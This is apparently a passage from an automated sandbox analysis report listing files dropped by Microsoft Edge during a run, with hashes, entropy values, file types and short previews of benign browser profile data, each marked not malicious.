Preview:	SNSS.........AV.............AV......"..AV.............AV.........AV.........AV.........AV....!....AV.................................AV..AV1..,.....AV$...f9753f6f_0836_4ad6_8ab7_4887aadc1752.....AV.........AV.....=...........AV.....AV.........................AV....................5..0.....AV&...{46F3A197-DB49-410A-81B3-94975C835573}.......AV............AV.........................AV.............AV........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........z.X.'...z.X.'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	356
Entropy (8bit):	5.10452093366576
Encrypted:	false
SSDEEP:	6:HGJ9uTZFVN+q2PN723oH+Tcwt7Uh2ghZIFUt8YGJ9uTZFVZZmw+YGJ9uTkVkwONn:pZFH+vVaYebIhHh2FUt8MZFn/+MkV5On
MD5:	717010329E92AAD408E220C11E621C94
SHA1:	9F27907D25C3EB8C8DD2F5DCDEEFA5107D294716
SHA-256:	846FE7426A7B6AE420BA65C9C992282885DA52D1AD99874B5A394D189838EA97
SHA-512:	0459F7BF2E1AF6C78AA7F2F4AF1C66956E10DD7098FF5432074D8A7E4D6534B38CC2DF600EADCC29EBE0C187E5F0E86A0F9F36BB400853DAE09427AE65355FCF
Malicious:	false
Preview:	2024/11/23-01:09:31.462 1d4c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/23-01:09:31.462 1d4c Recovering log #3.2024/11/23-01:09:31.463 1d4c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	356
Entropy (8bit):	5.10452093366576
Encrypted:	false
SSDEEP:	6:HGJ9uTZFVN+q2PN723oH+Tcwt7Uh2ghZIFUt8YGJ9uTZFVZZmw+YGJ9uTkVkwONn:pZFH+vVaYebIhHh2FUt8MZFn/+MkV5On
MD5:	717010329E92AAD408E220C11E621C94
SHA1:	9F27907D25C3EB8C8DD2F5DCDEEFA5107D294716
SHA-256:	846FE7426A7B6AE420BA65C9C992282885DA52D1AD99874B5A394D189838EA97
SHA-512:	0459F7BF2E1AF6C78AA7F2F4AF1C66956E10DD7098FF5432074D8A7E4D6534B38CC2DF600EADCC29EBE0C187E5F0E86A0F9F36BB400853DAE09427AE65355FCF
Malicious:	false
Preview:	2024/11/23-01:09:31.462 1d4c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/23-01:09:31.462 1d4c Recovering log #3.2024/11/23-01:09:31.463 1d4c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	438
Entropy (8bit):	5.16820097557865
Encrypted:	false
SSDEEP:	12:3zgN+vVaYebvqBQFUt8kS/+5G3V5OaYebvqBvJ:3E6VaYebvZg8kaOaYebvk
MD5:	0F18DE3923FCE967DA4B640104794C29
SHA1:	5B8E832B649D59B407131FAAE7A671F541EACD9D
SHA-256:	C0C5EEF7A4A683D312C72C94D7067FCC90E3D6848E6C05D71743DFCA317E02A1
SHA-512:	4FE888E8ABCA11D7121AFB57CA92563869E7A8B79A1B511B128686F04A3FE7FC7B041DAB08EBEC00716B6F6F01D95B0307CC45FD2AFE0EF22F31159655A0245E
Malicious:	false
Preview:	2024/11/23-01:09:33.007 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/23-01:09:33.009 1dbc Recovering log #3.2024/11/23-01:09:33.011 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	438
Entropy (8bit):	5.16820097557865
Encrypted:	false
SSDEEP:	12:3zgN+vVaYebvqBQFUt8kS/+5G3V5OaYebvqBvJ:3E6VaYebvZg8kaOaYebvk
MD5:	0F18DE3923FCE967DA4B640104794C29
SHA1:	5B8E832B649D59B407131FAAE7A671F541EACD9D
SHA-256:	C0C5EEF7A4A683D312C72C94D7067FCC90E3D6848E6C05D71743DFCA317E02A1
SHA-512:	4FE888E8ABCA11D7121AFB57CA92563869E7A8B79A1B511B128686F04A3FE7FC7B041DAB08EBEC00716B6F6F01D95B0307CC45FD2AFE0EF22F31159655A0245E
Malicious:	false
Preview:	2024/11/23-01:09:33.007 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/23-01:09:33.009 1dbc Recovering log #3.2024/11/23-01:09:33.011 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\18e15034-0db1-4a85-b421-dcad99b05aaf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\203be858-fbc5-4609-81ea-99ecd660d154.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\4a99e6e3-e95b-4d84-85a3-ac552f7d1dc6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3c2c4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	426
Entropy (8bit):	5.206343577499166
Encrypted:	false
SSDEEP:	12:f+vVaYebvqBZFUt8lZ/+RV5OaYebvqBaJ:kVaYebvyg8l2OaYebvL
MD5:	280F982F4BB5097DC1C6E7468FB15645
SHA1:	A1988A969203AA4FA7F7E632144E84CDC695C670
SHA-256:	855C51751AD41D6FB2941A037D0CD59BF4BE1B5954B43E0A593E302A03E2BA79
SHA-512:	6278B9F7C9AE87A07542B2E2C774A5BED4DA5A146023DB102DC09F5B845DDC6E1067EA2810AA0EE1EF3D626229319A8E405D7A1D70AD31D062614578E8888F08
Malicious:	false
Preview:	2024/11/23-01:09:49.236 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/23-01:09:49.237 1dbc Recovering log #3.2024/11/23-01:09:49.240 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	426
Entropy (8bit):	5.206343577499166
Encrypted:	false
SSDEEP:	12:f+vVaYebvqBZFUt8lZ/+RV5OaYebvqBaJ:kVaYebvyg8l2OaYebvL
MD5:	280F982F4BB5097DC1C6E7468FB15645
SHA1:	A1988A969203AA4FA7F7E632144E84CDC695C670
SHA-256:	855C51751AD41D6FB2941A037D0CD59BF4BE1B5954B43E0A593E302A03E2BA79
SHA-512:	6278B9F7C9AE87A07542B2E2C774A5BED4DA5A146023DB102DC09F5B845DDC6E1067EA2810AA0EE1EF3D626229319A8E405D7A1D70AD31D062614578E8888F08
Malicious:	false
Preview:	2024/11/23-01:09:49.236 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/23-01:09:49.237 1dbc Recovering log #3.2024/11/23-01:09:49.240 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.109369087059612
Encrypted:	false
SSDEEP:	6:HGJ9uTm/GOq2PN723oH+TcwtpIFUt8YGJ9uTm/GXZmw+YGJ9uTm/GFkwON723oHs:peGOvVaYebmFUt8MeGX/+MeGF5OaYeb7
MD5:	BD89F570870F6FE2A7317028A24A9521
SHA1:	18C2103AA84480F162372B93189D99B398183EE4
SHA-256:	22A095E9C3FA064A806D47FEFB8D0DCF186BB7EFD50C42FB9662224A576F44AC
SHA-512:	28D80A63CE858A4F3317C187E2D1FAD941C78665034718E2406018B6FF74F226D2397F83AF40942D8B40B43780F8E2B49AA1398C84321A042764E7A73DFF5606
Malicious:	false
Preview:	2024/11/23-01:09:31.701 1da0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/23-01:09:31.701 1da0 Recovering log #3.2024/11/23-01:09:31.701 1da0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.109369087059612
Encrypted:	false
SSDEEP:	6:HGJ9uTm/GOq2PN723oH+TcwtpIFUt8YGJ9uTm/GXZmw+YGJ9uTm/GFkwON723oHs:peGOvVaYebmFUt8MeGX/+MeGF5OaYeb7
MD5:	BD89F570870F6FE2A7317028A24A9521
SHA1:	18C2103AA84480F162372B93189D99B398183EE4
SHA-256:	22A095E9C3FA064A806D47FEFB8D0DCF186BB7EFD50C42FB9662224A576F44AC
SHA-512:	28D80A63CE858A4F3317C187E2D1FAD941C78665034718E2406018B6FF74F226D2397F83AF40942D8B40B43780F8E2B49AA1398C84321A042764E7A73DFF5606
Malicious:	false
Preview:	2024/11/23-01:09:31.701 1da0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/23-01:09:31.701 1da0 Recovering log #3.2024/11/23-01:09:31.701 1da0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2679202604236273
Encrypted:	false
SSDEEP:	384:L/2qOB1nxCkMZSA1LyKOMq+8iP5GDHP/0jMVumI:Kq+n0JZ91LyKOMq+8iP5GLP/0t
MD5:	DE483EA8409E6F5D918E93F128B24435
SHA1:	FCB5189D11F3AC0AA317DC6F9D605D9D902D140C
SHA-256:	9565EA3CB30E982CA8F1B8B718CD52B7FA933765FAB93A40F76C3F62C2B5F65C
SHA-512:	1C82E251665280B74485B3B661D35C0F431E2D7FC8D02F61F788F462B1FC6829C4A4C7D5AE736ED648C2BB91C0F5800CE7A67D48B3C7A4A8C4ED77B6CBAA9002
Malicious:	false
Preview:	SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4670166298265613
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0SX:v7doKsKuKZKlZNmu46yjx0q
MD5:	361E2A80E4526A08A53734445B000BD8
SHA1:	B763480B6EFAA1A56B3E0CCB85C1AB8C426D3A67
SHA-256:	759EB29362B5E86E6421EBCA0F23C5C9A9B197AEFBCA362A7D0791BACA537542
SHA-512:	712E28EEB13DBA92A8E4792ECBA05172C858E292D700325FBA0370EDBFA2FE58B4FF4849FB7E240A3A7B75D0CAC57FB4CA878122988A235D105B464A721E8BF2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\aef8b14e-3f48-4f4f-9dfd-bbacde0db42e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17380), with no line terminators
Category:	dropped
Size (bytes):	17382
Entropy (8bit):	5.486846848834692
Encrypted:	false
SSDEEP:	192:stwJ99QTryDiuabatSuypBsPuBaFvrEUJikkDZNv9/5KsYiam7tTkc8JbV+FEpQ3:stwPGQSu4BsPuBCD5KYVizkbGmQwGP
MD5:	4EA48E54E523589CB5764BF02D39316A
SHA1:	F7EC5272DD34A00B4C8D121C3858F2B453658A8C
SHA-256:	E1714FC0126D360AB270A214EF699FB5C9B246B40979E3253739A48AF2B7636E
SHA-512:	772EF899BA0720A72C3EF66E3DEB8AB56AFE060DF0D2D659B5C91593C801C3FEA2ABBD2DDE52C0011CCF4EB0F0DDB472C7E02822A27724B214D06B11762931D4
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
